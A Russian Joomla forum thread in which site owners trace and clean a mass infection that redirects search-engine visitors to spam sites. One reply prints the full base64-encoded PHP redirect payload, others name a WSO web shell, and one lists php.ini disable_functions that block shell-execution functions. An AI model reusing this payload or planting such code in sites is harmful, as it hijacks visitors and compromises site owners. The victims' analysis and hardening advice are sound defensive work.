Новости Joomla

Вышло обновление JL Like 5.2

Вышло обновление JL Like 5.2

JL Like — современный плагин для Joomla, который добавляет стильные кнопки "Поделиться" и счетчики лайков популярных соцсетей.

Совет по Joomla: использовать выключенное состояние для кнопок в списках элементов админки

Онлайн-трансляции Joomla-разработки Игоря Бердичевского

1 2  Все   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 51 Ответов
  • 32856 Просмотров
*

asdf27

  • Захожу иногда
  • 120
  • 7 / 0
Переадресация, Редирект, Вирус
« : 04.11.2011, 18:55:33 »
Доброго времени, форумчане.

Столкнулся с проблемой: со всех входящих ссылок происходит переадресация. Т.е. если ввести в ПС адрес сайта, а потом перейти, он перекинет сперва на http://goooogle.osa.pl, а потом по своему усмотрению (казино или диета). Если вбить напрямую, откроет сайт без проблем.

На VPS'ке дебиан, крутится десяток сайтов, все на J 1.5. И на всех такая байда. htaccess чистый.

Для пробы закидывал чистый index.html, с ПС идет нормально. Дальше начал рыть в index.php:

После удаления 21-ой строчки
Код
require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );

с ПС переходит, хоть и ругается ошибками.

Дальше я пошел в файл includes/defines.php и снова нарыл строку, после удаления которой с ПС сайт открывает, но так же, с ошибками
Код
$parts = explode( DS, JPATH_BASE );

Куда дальше?  !
« Последнее редактирование: 06.11.2011, 00:54:52 от asdf27 »
Записан
*

asdf27

  • Захожу иногда
  • 120
  • 7 / 0
Re: Переадресация
« Ответ #1 : 06.11.2011, 00:00:53 »
Разобрался... Жаль что никто не помог, сэкономил бы время.

Был вирус, который редиректил на поиск, после на нужный сайт.

1. В теле php файла плагина найден код
Код
("DQoNCg0KZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwidHdpdHRlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhbmRleC5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtYWlsLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwiYXNrLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm1zbiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vayIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsJCQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ29vb29nbGUub3NhLnBsLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ=="));

Найти не сложно, у меня в 4000+ файлах был :) в самой шапке.

Далее, на сайте http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/ раскодировал, увидел присутствие урла, на который редиректит сайт.

Ну и через Notepad++ поисках в файлах - замена. Только муторно теперь, 10+ сайтов на серваке и каждый надо скачать, почистить и залить обратно :)
Записан
*

fedos23

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #2 : 29.12.2011, 11:27:28 »
А через что хакнули? неизвестно?
У меня такая же байда...
Записан
*

nsfgh

  • Новичок
  • 8
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #3 : 29.12.2011, 17:33:09 »
Тоже самое сегодня случилось, просто восстановил из резервной копии. В логах техподдержка хостинга не разобралась.
Записан
*

asdf27

  • Захожу иногда
  • 120
  • 7 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #4 : 05.01.2012, 14:14:31 »
Цитата: fedos23 от 29.12.2011, 11:27:28
А через что хакнули? неизвестно?
У меня такая же байда...

На многих папках 777 стояли права. Но больше думаю на забытый, не удаленный Total cmd с сохраненным паролем.
Записан
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #5 : 07.01.2012, 07:15:13 »
аналогичная проблема, редирект из поисковых систем.
посмотрел сайт, посмотрел здоровые файлы, не пойму, зачем надо было удалять require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
эта строка идёт в стандарте.

в индексе удалил почти такой же код Base 64, всё равно редиректит, как и от куда, не пойму.
Записан
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #6 : 07.01.2012, 07:16:08 »
хакнули скорее всего через FTP, total CMD.
Записан
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Переадресация, Редирект, Вирус
« Ответ #7 : 07.01.2012, 09:34:42 »
И вам переписали все файлы. Я так понял, это был акт новогоднего вандализма. Надо перезаливать и вычищать.
Записан
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #8 : 07.01.2012, 15:44:40 »
а что перезалить?? поискал выборочно, не вижу больше нигде такого кода.
index я вычистил, не пойму, что сейчас срабатывает?
Записан
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Переадресация, Редирект, Вирус
« Ответ #9 : 07.01.2012, 15:57:42 »
делай бекап распаковывай но локалке и через поиск в  Total Commander  ищи

потом в php.ini выставь так
Код
register_globals=Off
safe_mode=Off
allow_url_fopen=Off
allow_url_include=Off
disable_functions=show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
open_basedir=полный путь к вашей директории
Записан
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Переадресация, Редирект, Вирус
« Ответ #10 : 07.01.2012, 16:47:20 »
Текст реплейсер и ищет и заменяет. Понравился очень.
Записан
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #11 : 07.01.2012, 17:28:38 »
инфицируются в основном два файла, но местами больше

это defines.php и index.php
Записан
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Переадресация, Редирект, Вирус
« Ответ #12 : 07.01.2012, 18:04:18 »
Это новогодняя вирусная атака. Почти 100% перегажены почти все файлы. Текст реплейсер найдет, какие именно :)
Записан
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #13 : 08.01.2012, 05:58:02 »
Пострадавшие, напишите на каком хосте.
Мои личне наблюдения, хакнули сайты только на хосте timeweb, остальные ресурсы не пострадали.
Вывод - это не тотал командер.
Записан
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Переадресация, Редирект, Вирус
« Ответ #14 : 08.01.2012, 10:48:54 »
Вполне возможно таймвеб хакнули?
Записан
*

asdf27

  • Захожу иногда
  • 120
  • 7 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #15 : 08.01.2012, 17:10:54 »
У меня hc.ru . Для поиск хорошо подходит Notepad++.
Записан
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #16 : 08.01.2012, 17:46:42 »
Ясно, значит не только timweb.
Но пришли со стороны хостера, сейчас логи буду изучать.
Записан
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #17 : 10.01.2012, 17:46:29 »
атака продолжается, только я всё зачистил, поменял все пароли и явки, два дня, все сайты опять загажены, один пациент очень сильно, загажены все php файлы, в одном файле по 10 раз, это трындец.....

Кстати не всё на CMS Joomla.
Записан
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Переадресация, Редирект, Вирус
« Ответ #18 : 10.01.2012, 19:26:32 »
Разве что перенести сайты на другого хостера, разбить на несколько аккаунтов, перед этим сменить пароли администраторов, залить поверх базы данных (снести все файлы и залить свежие версии).
Записан
*

madal

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #19 : 10.01.2012, 20:02:05 »
Сегодня сносил тот же самый вирус. Написали скрипт который все файлы заменял. Найдено аж 106тыс зараженных файлов.
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Переадресация, Редирект, Вирус
« Ответ #20 : 11.01.2012, 10:31:38 »
хорошо школьники новый год справили ^-^
Записан
*

magyar

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #21 : 11.01.2012, 11:40:01 »
такая же байда больше 60 сайтов с этой хренью, 95% Joomla от 1.5.17 до 1.5.25 и 1.7.3, wordpress точно так же взломан, еще 4 сайта не на нашем хостинге. сейчас восстанавливаюсь, но что предпринять для предотвращения инцидента?
Записан
*

magyar

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #22 : 11.01.2012, 11:42:00 »
как думаете есть ли смысл в отдел "К" обращаться?
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Переадресация, Редирект, Вирус
« Ответ #23 : 11.01.2012, 12:12:18 »
отдел "К" обращаться должен замученный вами хостер, а не вы
а вам необходимо на столько его замучить, или просто всем съехать разом и негатив написать везде, тогда он зашевелиться быстрее ^-^
Записан
*

asdf27

  • Захожу иногда
  • 120
  • 7 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #24 : 11.01.2012, 15:51:34 »
106к... Сколько же у вас сайт весит? :)
Вся проблема, как мне кажется, в правах на папки. Когда несколько доменов, аппач работает под одним юзверем, и сломав один домен, вирь легко пробирается в другие папки.

Всю ночь провозился со своим debian, но php как cgi так и не смог заставить работать. Видимо, придется менять хоста. Уже запарился чистить.
Записан
*

n55

  • Новичок
  • 4
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #25 : 12.01.2012, 18:32:39 »
У меня на Sweb также все сайта на Joomla заражены.
Причем на одном - всего два файлика, а на другом - ооочень много, больше сотни.


Записан
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Переадресация, Редирект, Вирус
« Ответ #26 : 12.01.2012, 19:00:14 »
Да уж... и смотрю все на больших хостингах.
Записан
*

shapeout

  • Осваиваюсь на форуме
  • 18
  • 0 / 0
  • все что связано с велосипедами - www.veloarena.ru
Re: Переадресация, Редирект, Вирус
« Ответ #27 : 14.01.2012, 12:21:06 »
Всем привет.
У меня тоже до НГ сайты хакнули.
Как я понял у меня было 4 вируса.
один - это eval(base64_decode потом идёт куча всего, что зашифрованно. (в основном вирус который редиректор)
второй - это шелл, в моём случае WSO 2 лежал в components/com_search файл называется class.php Если его внимательно посмотреть, то можно заметить куски того "зашифрованного гамна" из которого собирается первый  вирус, но это моё предположение. Еще нашел один шелл, один-в-один как этот, тока лежал в папке mod_myblog_arhive, внутри шелла есть описание его и кем написан.
Код
  * WSO 2
 * Web Shell by oRb
третье - это в папке plugins лежит папка mod в которой есть архив (сам себя заархивированный) и собсно сам по себе вирус. Он, как я понял, занимается спапом. Я просто снёс папку и всё. Особо разбираться некогда было.
четвертое - это всем уже (наверное) известный редиректор. :) сам редиректор выглядит как
Код
if(preg_match('!MIDP|WAP|Windows.CE и далее куча-куча перечислений
и второй
Код
<script>b=new функция, потом всё в зашифрованном виде типа [b]-t+число[/b]куча-куча
и всё это расшифровывается eval( - собсно по этому выражению я и искал.
Искал я всё это безобразие фаром по тексту в файле. Муторная скажу я Вам работёнка, но уж лучше в ручную, чем чё нить важное потереть... Возможно, что всё мной рассказанное - это одно целое.
Как я боролся.
Первым делом в корень сайта кинул файл .ftpaccess - с содержанием
Код
<Limit ALL>
Allow from 127.0.0.1 // здесь IP разрешенному доступ
Deny from all // всем (остальным) запретить
ListOptions "+a" // скрыть все файлы начинающиеся с точки
</Limit>
Можно еще в Google порыть, найти еще настроек.
Начал искать по тексту вируса, в каких еще файлах встречается... На всякий пожарный делал копии, изучал и искал. Собсно всё.
Ща еще базу буду проверять, вдруг там тоже нагадили.

Вот теперь сижу и думаю, как базу подчистить? Я там стока интересного нашел... Никто случаем не знает?
« Последнее редактирование: 14.01.2012, 22:42:42 от shapeout »
Записан
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Переадресация, Редирект, Вирус
« Ответ #28 : 14.01.2012, 13:25:30 »
Вот htaccess от Nicholas K. Dionysopoulos ведущего разработчика AkeebaBackup.com
возможно кто то что то найдет для себя полезное

Спойлер
[свернуть]

Это своего рода шаблон который требует некоторых изменений
__________________________________________________________________________

Также что то можно использовать отсюда

Спойлер
[свернуть]

Записан
*

mamedovvs

  • Новичок
  • 7
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #29 : 24.01.2012, 18:03:31 »
Та же проблема все сайты на Joomla заражены. Очистил и удалил все ftp аккаунты и что, через день та же хрень все заражены. Написал скриптик на python если нужно могу выложить, для поиска и удаления строки eval. Но главная причина понять почему так происходит, может быть нужно права расставить правильные.
Записан
1 2  Все   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

 Ответов: 2
Просмотров: 2496 		Последний ответ 14.02.2024, 13:15:59
от wishlight
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

 Ответов: 1
Просмотров: 3473 		Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

 Ответов: 24
Просмотров: 5104 		Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

 Ответов: 6
Просмотров: 3506 		Последний ответ 22.02.2022, 11:38:15
от AlexP750
Спам, вирус или дело в браузере Google

Автор alekcae

 Ответов: 13
Просмотров: 2109 		Последний ответ 16.05.2021, 18:52:24
от alekcae